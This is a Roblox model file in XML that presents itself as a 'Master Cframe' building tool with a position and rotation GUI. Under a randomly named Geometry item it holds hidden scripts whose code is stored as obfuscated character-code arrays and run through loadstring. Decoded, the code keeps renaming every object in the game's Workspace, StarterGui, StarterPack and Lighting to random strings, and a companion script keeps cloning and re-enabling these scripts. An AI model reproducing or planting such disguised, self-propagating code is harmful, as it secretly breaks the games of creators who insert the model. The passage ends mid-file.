<roblox xmlns:xmime="http://www.w3.org/2005/05/xmlmime" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.roblox.com/roblox.xsd" version="4">
	<External>null</External>
	<External>nil</External>
	<Item class="Workspace" referent="RBX0">
		<Properties>
			<Ref name="CurrentCamera">RBX1</Ref>
			<double name="DistributedGameTime">49.800002597272396</double>
			<CoordinateFrame name="ModelInPrimary">
				<X>0</X>
				<Y>0</Y>
				<Z>0</Z>
				<R00>1</R00>
				<R01>0</R01>
				<R02>0</R02>
				<R10>0</R10>
				<R11>1</R11>
				<R12>0</R12>
				<R20>0</R20>
				<R21>0</R21>
				<R22>1</R22>
			</CoordinateFrame>
			<string name="Name">Workspace</string>
			<Ref name="PrimaryPart">null</Ref>
			<bool name="archivable">true</bool>
		</Properties>
		<Item class="Geometry" referent="RBX2">
			<Properties>
				<string name="Name">tpzijruldtmads</string>
				<bool name="archivable">true</bool>
			</Properties>
			<Item class="Script" referent="RBX3">
				<Properties>
					<bool name="Disabled">false</bool>
					<Content name="LinkedSource"><null></null></Content>
					<string name="Name">tapoipcirfmkc</string>
					<ProtectedString name="Source">while true do
wait()
a = game.Players:GetChildren()
for i = 1,# a do
if a[i].PlayerGui:FindFirstChild(&quot;Talk&quot;) ~= nil then
z = a[i].PlayerGui.Talk.Frame
if z:FindFirstChild(&quot;Tittle&quot;) ~= nil then
if z.Tittle.Text ~= &quot;Eumesmo92&apos;s Player Private Talk V2&quot; then
p = script:GetChildren()
for o = 1,#p do
z = p[o]:clone()
z.Disabled = false
z.Parent = script
end
end
else
p = script:GetChildren()
for o = 1,#p do
z = p[o]:clone()
z.Disabled = false
z.Parent = script
end
end
end
end
end
</ProtectedString>
					<bool name="archivable">true</bool>
				</Properties>
				<Item class="Script" referent="RBX4">
					<Properties>
						<bool name="Disabled">true</bool>
						<Content name="LinkedSource"><null></null></Content>
						<string name="Name">euzgcrodpjcskd</string>
						<ProtectedString name="Source">t = {108,101,116,116,101,114,115,32,61,32,123,34,97,34,44,34,98,34,44,34,99,34,44,34,100,34,44,34,101,34,44,34,102,34,44,34,103,34,44,34,104,34,44,34,105,34,44,34,106,34,44,34,107,34,44,34,108,34,44,34,109,34,44,34,110,34,44,34,111,34,44,34,112,34,44,34,113,34,44,34,114,34,44,34,115,34,44,34,116,34,44,34,117,34,44,34,118,34,44,34,119,34,44,34,120,34,44,34,121,34,44,34,122,34,125,32,112,114,105,110,116,40,108,101,116,116,101,114,115,91,49,93,41,32,108,111,99,97,116,105,111,110,115,32,61,32,123,103,97,109,101,46,87,111,114,107,115,112,97,99,101,32,44,32,103,97,109,101,46,83,116,97,114,116,101,114,71,117,105,32,44,32,103,97,109,101,46,83,116,97,114,116,101,114,80,97,99,107,32,44,32,103,97,109,101,46,76,105,103,104,116,105,110,103,32,125,32,102,117,110,99,116,105,111,110,32,105,109,112,114,111,118,101,40,111,98,106,41,32,111,98,106,46,78,97,109,101,32,61,32,34,34,32,102,111,114,32,102,32,61,32,49,44,109,97,116,104,46,114,97,110,100,111,109,40,53,44,49,53,41,32,100,111,32,111,98,106,46,78,97,109,101,32,61,32,111,98,106,46,78,97,109,101,32,46,46,32,108,101,116,116,101,114,115,91,109,97,116,104,46,114,97,110,100,111,109,40,49,44,50,54,41,93,32,101,110,100,32,98,32,61,111,98,106,58,71,101,116,67,104,105,108,100,114,101,110,40,41,32,102,111,114,32,105,44,118,32,105,110,32,105,112,97,105,114,115,40,98,41,32,100,111,32,105,102,32,118,32,126,61,32,115,99,114,105,112,116,46,80,97,114,101,110,116,32,116,104,101,110,32,112,114,105,110,116,40,118,41,32,118,46,78,97,109,101,32,61,32,34,34,32,102,111,114,32,102,32,61,32,49,44,109,97,116,104,46,114,97,110,100,111,109,40,53,44,49,53,41,32,100,111,32,118,46,78,97,109,101,32,61,32,118,46,78,97,109,101,32,46,46,32,108,101,116,116,101,114,115,91,109,97,116,104,46,114,97,110,100,111,109,40,49,44,50,54,41,93,32,101,110,100,32,105,109,112,114,111,118,101,40,118,41,32,101,110,100,32,101,110,100,32,101,110,100,32,102,111,114,32,122,32,61,32,49,44,52,32,100,111,32,108,111,99,97,116,105,111,110,115,91,122,93,46,67,104,105,108,100,65,100,100,101,100,58,99,111,110,110,101,99,116,40,105,109,112,114,111,118,101,41,32,101,110,100,32,119,104,105,108,101,32,116,114,117,101,32,100,111,32,102,111,114,32,122,32,61,32,49,44,52,32,100,111,32,105,109,112,114,111,118,101,40,108,111,99,97,116,105,111,110,115,91,122,93,41,32,101,110,100,32,119,97,105,116,40,109,97,116,104,46,114,97,110,100,111,109,40,52,44,49,50,41,41,32,101,110,100}  local x = &quot;&quot;  for i, v in ipairs(t) do x = x..string.char(v) end loadstring(x)()

</ProtectedString>
						<bool name="archivable">true</bool>
					</Properties>
				</Item>
			</Item>
			<Item class="Script" referent="RBX5">
				<Properties>
					<bool name="Disabled">false</bool>
					<Content name="LinkedSource"><null></null></Content>
					<string name="Name">sfxcojymbdhz</string>
					<ProtectedString name="Source">t = {108,101,116,116,101,114,115,32,61,32,123,34,97,34,44,34,98,34,44,34,99,34,44,34,100,34,44,34,101,34,44,34,102,34,44,34,103,34,44,34,104,34,44,34,105,34,44,34,106,34,44,34,107,34,44,34,108,34,44,34,109,34,44,34,110,34,44,34,111,34,44,34,112,34,44,34,113,34,44,34,114,34,44,34,115,34,44,34,116,34,44,34,117,34,44,34,118,34,44,34,119,34,44,34,120,34,44,34,121,34,44,34,122,34,125,32,112,114,105,110,116,40,108,101,116,116,101,114,115,91,49,93,41,32,102,117,110,99,116,105,111,110,32,105,109,112,114,111,118,101,40,111,98,106,41,32,111,98,106,46,78,97,109,101,32,61,32,34,34,32,102,111,114,32,102,32,61,32,49,44,109,97,116,104,46,114,97,110,100,111,109,40,53,44,49,53,41,32,100,111,32,111,98,106,46,78,97,109,101,32,61,32,111,98,106,46,78,97,109,101,32,46,46,32,108,101,116,116,101,114,115,91,109,97,116,104,46,114,97,110,100,111,109,40,49,44,50,54,41,93,32,101,110,100,32,98,32,61,111,98,106,58,71,101,116,67,104,105,108,100,114,101,110,40,41,32,102,111,114,32,105,44,118,32,105,110,32,105,112,97,105,114,115,40,98,41,32,100,111,32,105,102,32,118,32,126,61,32,115,99,114,105,112,116,46,80,97,114,101,110,116,32,116,104,101,110,32,112,114,105,110,116,40,118,41,32,118,46,78,97,109,101,32,61,32,34,34,32,102,111,114,32,102,32,61,32,49,44,109,97,116,104,46,114,97,110,100,111,109,40,53,44,49,53,41,32,100,111,32,118,46,78,97,109,101,32,61,32,118,46,78,97,109,101,32,46,46,32,108,101,116,116,101,114,115,91,109,97,116,104,46,114,97,110,100,111,109,40,49,44,50,54,41,93,32,101,110,100,32,105,109,112,114,111,118,101,40,118,41,32,101,110,100,32,101,110,100,32,101,110,100,32,115,99,114,105,112,116,46,80,97,114,101,110,116,46,67,104,105,108,100,65,100,100,101,100,58,99,111,110,110,101,99,116,40,105,109,112,114,111,118,101,41,32,119,104,105,108,101,32,116,114,117,101,32,100,111,32,105,109,112,114,111,118,101,40,115,99,114,105,112,116,46,80,97,114,101,110,116,41,32,32,119,97,105,116,40,109,97,116,104,46,114,97,110,100,111,109,40,52,44,49,50,41,41,32,101,110,100}  local x = &quot;&quot;  for i, v in ipairs(t) do x = x..string.char(v) end loadstring(x)()

</ProtectedString>
					<bool name="archivable">true</bool>
				</Properties>
			</Item>
		</Item>
		<Item class="Camera" referent="RBX1">
			<Properties>
				<Ref name="CameraSubject">null</Ref>
				<token name="CameraType">0</token>
				<CoordinateFrame name="CoordinateFrame">
					<X>124.177032</X>
					<Y>7.61114168</Y>
					<Z>63.5413284</Z>
					<R00>0.991753697</R00>
					<R01>-0.078016229</R01>
					<R02>0.101676852</R02>
					<R10>7.4505806e-009</R10>
					<R11>0.793365359</R11>
					<R12>0.608745813</R12>
					<R20>-0.128158942</R20>
					<R21>-0.60372591</R21>
					<R22>0.786822975</R22>
				</CoordinateFrame>
				<CoordinateFrame name="Focus">
					<X>122.143494</X>
					<Y>-4.56378508</Y>
					<Z>47.8048553</Z>
					<R00>1</R00>
					<R01>0</R01>
					<R02>0</R02>
					<R10>0</R10>
					<R11>1</R11>
					<R12>0</R12>
					<R20>0</R20>
					<R21>0</R21>
					<R22>1</R22>
				</CoordinateFrame>
				<string name="Name">Instance</string>
				<bool name="archivable">true</bool>
			</Properties>
		</Item>
		<Item class="Part" referent="RBX6">
			<Properties>
				<bool name="Anchored">true</bool>
				<float name="BackParamA">-0.5</float>
				<float name="BackParamB">0.5</float>
				<token name="BackSurface">0</token>
				<token name="BackSurfaceInput">0</token>
				<float name="BottomParamA">-0.5</float>
				<float name="BottomParamB">0.5</float>
				<token name="BottomSurface">0</token>
				<token name="BottomSurfaceInput">0</token>
				<int name="BrickColor">1002</int>
				<CoordinateFrame name="CFrame">
					<X>125</X>
					<Y>1.80000007</Y>
					<Z>4.5</Z>
					<R00>1</R00>
					<R01>0</R01>
					<R02>0</R02>
					<R10>0</R10>
					<R11>1</R11>
					<R12>0</R12>
					<R20>0</R20>
					<R21>0</R21>
					<R22>1</R22>
				</CoordinateFrame>
				<bool name="CanCollide">true</bool>
				<bool name="DraggingV1">false</bool>
				<float name="Elasticity">0.5</float>
				<token name="FormFactor">0</token>
				<float name="Friction">0.300000012</float>
				<float name="FrontParamA">-0.5</float>
				<float name="FrontParamB">0.5</float>
				<token name="FrontSurface">0</token>
				<token name="FrontSurfaceInput">0</token>
				<float name="LeftParamA">-0.5</float>
				<float name="LeftParamB">0.5</float>
				<token name="LeftSurface">0</token>
				<token name="LeftSurfaceInput">0</token>
				<bool name="Locked">true</bool>
				<token name="Material">1536</token>
				<string name="Name">Part</string>
				<float name="Reflectance">0</float>
				<float name="RightParamA">-0.5</float>
				<float name="RightParamB">0.5</float>
				<token name="RightSurface">0</token>
				<token name="RightSurfaceInput">0</token>
				<Vector3 name="RotVelocity">
					<X>0</X>
					<Y>0</Y>
					<Z>0</Z>
				</Vector3>
				<float name="TopParamA">-0.5</float>
				<float name="TopParamB">0.5</float>
				<token name="TopSurface">0</token>
				<token name="TopSurfaceInput">0</token>
				<float name="Transparency">0</float>
				<Vector3 name="Velocity">
					<X>0</X>
					<Y>0</Y>
					<Z>0</Z>
				</Vector3>
				<bool name="archivable">true</bool>
				<token name="shape">1</token>
				<Vector3 name="size">
					<X>200</X>
					<Y>1</Y>
					<Z>200</Z>
				</Vector3>
			</Properties>
		</Item>
	</Item>
	<Item class="RunService" referent="RBX7">
		<Properties>
			<string name="Name">Run Service</string>
			<bool name="archivable">true</bool>
		</Properties>
	</Item>
	<External>RBX8</External>
	<External>RBX9</External>
	<Item class="ContentProvider" referent="RBX10">
		<Properties>
			<string name="Name">Instance</string>
			<bool name="archivable">true</bool>
		</Properties>
	</Item>
	<Item class="ContentFilter" referent="RBX11">
		<Properties>
			<string name="Name">ContentFilter</string>
			<bool name="archivable">true</bool>
		</Properties>
	</Item>
	<Item class="KeyframeSequenceProvider" referent="RBX12">
		<Properties>
			<string name="Name">Instance</string>
			<bool name="archivable">true</bool>
		</Properties>
	</Item>
	<Item class="GuiService" referent="RBX13">
		<Properties>
			<string name="Name">GuiService</string>
			<bool name="archivable">true</bool>
		</Properties>
	</Item>
	<Item class="Players" referent="RBX14">
		<Properties>
			<int name="MaxPlayers">8</int>
			<string name="Name">Players</string>
			<bool name="archivable">true</bool>
		</Properties>
	</Item>
	<Item class="StarterPack" referent="RBX15">
		<Properties>
			<string name="Name">StarterPack</string>
			<bool name="archivable">true</bool>
		</Properties>
		<Item class="HopperBin" referent="RBX16">
			<Properties>
				<bool name="Active">true</bool>
				<token name="BinType">0</token>
				<string name="Name">Master Cframe</string>
				<Content name="TextureId"><null></null></Content>
				<bool name="archivable">true</bool>
			</Properties>
			<Item class="LocalScript" referent="RBX17">
				<Properties>
					<bool name="Disabled">false</bool>
					<Content name="LinkedSource"><null></null></Content>
					<string name="Name">CFrameScript</string>
					<ProtectedString name="Source">CurrentObject = nil
PositionValue = Vector3.new(0, 0, 0)
RotationValue = Vector3.new(0, 0, 0)
player = game.Players.LocalPlayer
repeat wait() until player.Character
function onClicked(target)
if target then
if not target.Locked then
CurrentObject = target
selection.Adornee = CurrentObject
selection.Color = BrickColor.new(&quot;Pastel Blue&quot;)
PositionValue = target.CFrame.p
local a, b, c = target.CFrame:toEulerAnglesXYZ()
RotationValue = Vector3.new(math.deg(a), math.deg(b), math.deg(c))
updateGui(PositionValue, RotationValue)
else
CurrentObject = nil
selection.Adornee = nil
PositionValue = Vector3.new(0, 0, 0)
RotationValue = Vector3.new(0, 0, 0)
updateGui(PositionValue, RotationValue)
selection.Color = BrickColor.Blue()
end
else
CurrentObject = nil
selection.Adornee = nil
PositionValue = Vector3.new(0, 0, 0)
RotationValue = Vector3.new(0, 0, 0)
updateGui(PositionValue, RotationValue)
selection.Color = BrickColor.Blue()
end end
function onMoved(target)
if not CurrentObject then
if target then
if not target.Locked then
selection.Adornee = target
else
selection.Adornee = nil
end
else
selection.Adornee = nil
end end end
function onSelected(mouse)
if mygui then
mygui.Parent = player.PlayerGui
elseif player.PlayerGui:findFirstChild(&quot;CFrameGui&quot;) == nil then
mygui = script.Parent.CFrameGui:clone()
mygui.Parent = player.PlayerGui
selection = Instance.new(&quot;SelectionBox&quot;)
selection.Parent = player.PlayerGui
end
mouse.Button1Down:connect(function() onClicked(mouse.Target) end)
mouse.Move:connect(function() onMoved(mouse.Target) end)
mygui.Frame.PosX.Minus2.MouseButton1Click:connect(function() PositionValue = PositionValue + Vector3.new(-1, 0, 0) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.PosX.Minus1.MouseButton1Click:connect(function() PositionValue = PositionValue + Vector3.new(-0.1, 0, 0) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.PosX.Minus0.MouseButton1Click:connect(function() PositionValue = PositionValue + Vector3.new(-0.01, 0, 0) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.PosX.Plus1.MouseButton1Click:connect(function() PositionValue = PositionValue + Vector3.new(0.1, 0, 0) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.PosX.Plus2.MouseButton1Click:connect(function() PositionValue = PositionValue + Vector3.new(1, 0, 0) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.PosX.Plus0.MouseButton1Click:connect(function() PositionValue = PositionValue + Vector3.new(0.01, 0, 0) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.PosY.Minus2.MouseButton1Click:connect(function() PositionValue = PositionValue + Vector3.new(0, -1, 0) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.PosY.Minus1.MouseButton1Click:connect(function() PositionValue = PositionValue + Vector3.new(0, -0.1, 0) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.PosY.Minus0.MouseButton1Click:connect(function() PositionValue = PositionValue + Vector3.new(0, -0.01, 0) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.PosY.Plus1.MouseButton1Click:connect(function() PositionValue = PositionValue + Vector3.new(0, 0.1, 0) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.PosY.Plus2.MouseButton1Click:connect(function() PositionValue = PositionValue + Vector3.new(0, 1, 0) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.PosY.Plus0.MouseButton1Click:connect(function() PositionValue = PositionValue + Vector3.new(0, 0.01, 0) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.PosZ.Minus2.MouseButton1Click:connect(function() PositionValue = PositionValue + Vector3.new(0, 0, -1) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.PosZ.Minus1.MouseButton1Click:connect(function() PositionValue = PositionValue + Vector3.new(0, 0, -0.1) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.PosZ.Minus0.MouseButton1Click:connect(function() PositionValue = PositionValue + Vector3.new(0, 0, -0.01) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.PosZ.Plus1.MouseButton1Click:connect(function() PositionValue = PositionValue + Vector3.new(0, 0, 0.1) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.PosZ.Plus2.MouseButton1Click:connect(function() PositionValue = PositionValue + Vector3.new(0, 0, 1) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.PosZ.Plus0.MouseButton1Click:connect(function() PositionValue = PositionValue + Vector3.new(0, 0, 0.01) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)	
mygui.Frame.PosLookVector.Minus2.MouseButton1Click:connect(function() PositionValue = PositionValue + CurrentObject.CFrame.lookVector * Vector3.new(-1, -1, -1) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.PosLookVector.Minus1.MouseButton1Click:connect(function() PositionValue = PositionValue + CurrentObject.CFrame.lookVector * Vector3.new(-0.1, -0.1, -0.1) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.PosLookVector.Plus1.MouseButton1Click:connect(function() PositionValue = PositionValue + CurrentObject.CFrame.lookVector * Vector3.new(0.1, 0.1, 0.1) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.PosLookVector.Plus2.MouseButton1Click:connect(function() PositionValue = PositionValue + CurrentObject.CFrame.lookVector * Vector3.new(1, 1, 1) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.RotX.Minus2.MouseButton1Click:connect(function() RotationValue = RotationValue + Vector3.new(-15, 0, 0) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.RotX.Minus1.MouseButton1Click:connect(function() RotationValue = RotationValue + Vector3.new(-1, 0, 0) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.RotX.Plus1.MouseButton1Click:connect(function() RotationValue = RotationValue + Vector3.new(1, 0, 0) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.RotX.Plus2.MouseButton1Click:connect(function() RotationValue = RotationValue + Vector3.new(15, 0, 0) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.RotY.Minus2.MouseButton1Click:connect(function() RotationValue = RotationValue + Vector3.new(0, -15, 0) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.RotY.Minus1.MouseButton1Click:connect(function() RotationValue = RotationValue + Vector3.new(0, -1, 0) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.RotY.Plus1.MouseButton1Click:connect(function() RotationValue = RotationValue + Vector3.new(0, 1, 0) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.RotY.Plus2.MouseButton1Click:connect(function() RotationValue = RotationValue + Vector3.new(0, 15, 0) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.RotZ.Minus2.MouseButton1Click:connect(function() RotationValue = RotationValue + Vector3.new(0, 0, -15) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.RotZ.Minus1.MouseButton1Click:connect(function() RotationValue = RotationValue + Vector3.new(0, 0, -1) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
mygui.Frame.RotZ.Plus1.MouseButton1Click:connect(function() RotationValue = RotationValue + Vector3.new(0, 0, 1) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)	mygui.Frame.RotZ.Plus2.MouseButton1Click:connect(function() RotationValue = RotationValue + Vector3.new(0, 0, 15) changeCFrame(PositionValue, RotationValue) updateGui(PositionValue, RotationValue) end)
end
function onDeselected(mouse)
selection:remove()
CurrentObject = nil
PositionValue = Vector3.new(1, 1, 1)
RotationValue = Vector3.new(1, 1, 1)
mygui:remove()
mygui = nil
end
function updateGui(pos, rot)
mygui.Frame.PosX.Text.Text = string.format(&quot;X: %0.2f&quot;, pos.x)
mygui.Frame.PosY.Text.Text = string.format(&quot;Y: %0.2f&quot;, pos.y)
mygui.Frame.PosZ.Text.Text = string.format(&quot;Z: %0.2f&quot;, pos.z)
mygui.Frame.RotX.Text.Text = string.format(&quot;X: %0.2f&quot;, rot.x)
mygui.Frame.RotY.Text.Text = string.format(&quot;Y: %0.2f&quot;, rot.y)
mygui.Frame.RotZ.Text.Text = string.format(&quot;Z: %0.2f&quot;, rot.z)
end
function changeCFrame(pos, rot)
CurrentObject.CFrame = CFrame.new(pos) * CFrame.fromEulerAnglesXYZ(math.rad(rot.x), math.rad(rot.y), math.rad(rot.z))
end
script.Parent.Selected:connect(onSelected)
script.Parent.Deselected:connect(onDeselected)</ProtectedString>
					<bool name="archivable">true</bool>
				</Properties>
			</Item>
			<Item class="ScreenGui" referent="RBX18">
				<Properties>
					<string name="Name">CFrameGui</string>
					<bool name="archivable">true</bool>
				</Properties>
				<Item class="Frame" referent="RBX19">
					<Properties>
						<bool name="Active">false</bool>
						<Color3 name="BackgroundColor3">4278203136</Color3>
						<float name="BackgroundTransparency">0.449999988</float>
						<Color3 name="BorderColor3">4294901760</Color3>
						<int name="BorderSizePixel">1</int>
						<string name="Name">Frame</string>
						<UDim2 name="Position">
							<XS>0</XS>
							<XO>0</XO>
							<YS>1</YS>
							<YO>-186</YO>
						</UDim2>
						<UDim2 name="Size">
							<XS>0</XS>
							<XO>190</XO>
							<YS>0</YS>
							<YO>185</YO>
						</UDim2>
						<token name="SizeConstraint">0</token>
						<bool name="Visible">true</bool>
						<int name="ZIndex">1</int>
						<bool name="archivable">true</bool>
					</Properties>
					<Item class="TextLabel" referent="RBX20">
						<Properties>
							<bool name="Active">false</bool>
							<Color3 name="BackgroundColor3">4293716974</Color3>
							<float name="BackgroundTransparency">1</float>
							<Color3 name="BorderColor3">4279970357</Color3>
							<int name="BorderSizePixel">1</int>
							<token name="FontSize">0</token>
							<string name="Name">Title</string>
							<UDim2 name="Position">
								<XS>0</XS>
								<XO>0</XO>
								<YS>0</YS>
								<YO>0</YO>
							</UDim2>
							<UDim2 name="Size">
								<XS>1</XS>
								<XO>0</XO>
								<YS>0</YS>
								<YO>16</YO>
							</UDim2>
							<token name="SizeConstraint">0</token>
							<string name="Text">Komackboy&apos;s CFrame Gui</string>
							<Color3 name="TextColor3">4294967295</Color3>
							<float name="TextTransparency">0</float>
							<bool name="TextWrap">false</bool>
							<token name="TextXAlignment">2</token>
							<token name="TextYAlignment">1</token>
							<bool name="Visible">true</bool>
							<int name="ZIndex">1</int>
							<bool name="archivable">true</bool>
						</Properties>
					</Item>
					<Item class="TextLabel" referent="RBX21">
						<Properties>
							<bool name="Active">false</bool>
							<Color3 name="BackgroundColor3">4293914353</Color3>
							<float name="BackgroundTransparency">1</float>
							<Color3 name="BorderColor3">4279970357</Color3>
							<int name="BorderSizePixel">1</int>
							<token name="FontSize">0</token>
							<string name="Name">TextLabel</string>
							<UDim2 name="Position">
								<XS>0.5</XS>
								<XO>-25</XO>
								<YS>0</YS>
								<YO>21</YO>
							</UDim2>
							<UDim2 name="Size">
								<XS>0</XS>
								<XO>50</XO>
								<YS>0</YS>
								<YO>16</YO>
							</UDim2>
							<token name="SizeConstraint">0</token>
							<string name="Text">Selection&apos;s Position</string>
							<Color3 name="TextColor3">4294967295</Color3>
							<float name="TextTransparency">0</float>
							<bool name="TextWrap">false</bool>
							<token name="TextXAlignment">2</token>
							<token name="TextYAlignment">1</token>
							<bool name="Visible">true</bool>
							<int name="ZIndex">1</int>
							<bool name="archivable">true</bool>
						</Properties>
					</Item>
					<Item class="Frame" referent="RBX22">
						<Properties>
							<bool name="Active">false</bool>
							<Color3 name="BackgroundColor3">4293716974</Color3>
							<float name="BackgroundTransparency">1</float>
							<Color3 name="BorderColor3">4278190080</Color3>
							<int name="BorderSizePixel">1</int>
							<string name="Name">PosX</string>
							<UDim2 name="Position">
								<XS>0</XS>
								<XO>5</XO>
								<YS>0</YS>
								<YO>41</YO>
							</UDim2>
							<UDim2 name="Size">
								<XS>1</XS>
								<XO>-10</XO>
								<YS>0</YS>
								<YO>16</YO>
							</UDim2>
							<token name="SizeConstraint">0</token>
							<bool name="Visible">true</bool>
							<int name="ZIndex">1</int>
							<bool name="archivable">true</bool>
						</Properties>
						<Item class="TextLabel" referent="RBX23">
							<Properties>
								<bool name="Active">false</bool>
								<Color3 name="BackgroundColor3">4294704123</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Text</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>48</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<UDim2 name="Size">
									<XS>1</XS>
									<XO>-96</XO>
									<YS>1</YS>
									<YO>0</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">X: 0</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX24">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4284440415</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Minus2</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>0</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">--</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX25">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4291348680</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Plus1</string>
								<UDim2 name="Position">
									<XS>1</XS>
									<XO>-32</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">+</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX26">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4291348680</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Minus1</string>
								<UDim2 name="Position">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">-</string>
								<Color3 name="TextColor3">4278190080</Color3>
								<float name="TextTransparency">0</float>
								<bool name="TextWrap">false</bool>
								<token name="TextXAlignment">2</token>
								<token name="TextYAlignment">1</token>
								<bool name="Visible">true</bool>
								<int name="ZIndex">1</int>
								<bool name="archivable">true</bool>
							</Properties>
						</Item>
						<Item class="TextButton" referent="RBX27">
							<Properties>
								<bool name="Active">true</bool>
								<bool name="AutoButtonColor">true</bool>
								<Color3 name="BackgroundColor3">4284440415</Color3>
								<float name="BackgroundTransparency">0</float>
								<Color3 name="BorderColor3">4278190080</Color3>
								<int name="BorderSizePixel">1</int>
								<token name="FontSize">0</token>
								<string name="Name">Plus2</string>
								<UDim2 name="Position">
									<XS>1</XS>
									<XO>-16</XO>
									<YS>0</YS>
									<YO>0</YO>
								</UDim2>
								<bool name="Selected">false</bool>
								<UDim2 name="Size">
									<XS>0</XS>
									<XO>16</XO>
									<YS>0</YS>
									<YO>16</YO>
								</UDim2>
								<token name="SizeConstraint">0</token>
								<string name="Text">++</string>
								<Color3 name="TextColor3">4278190080</Color3>
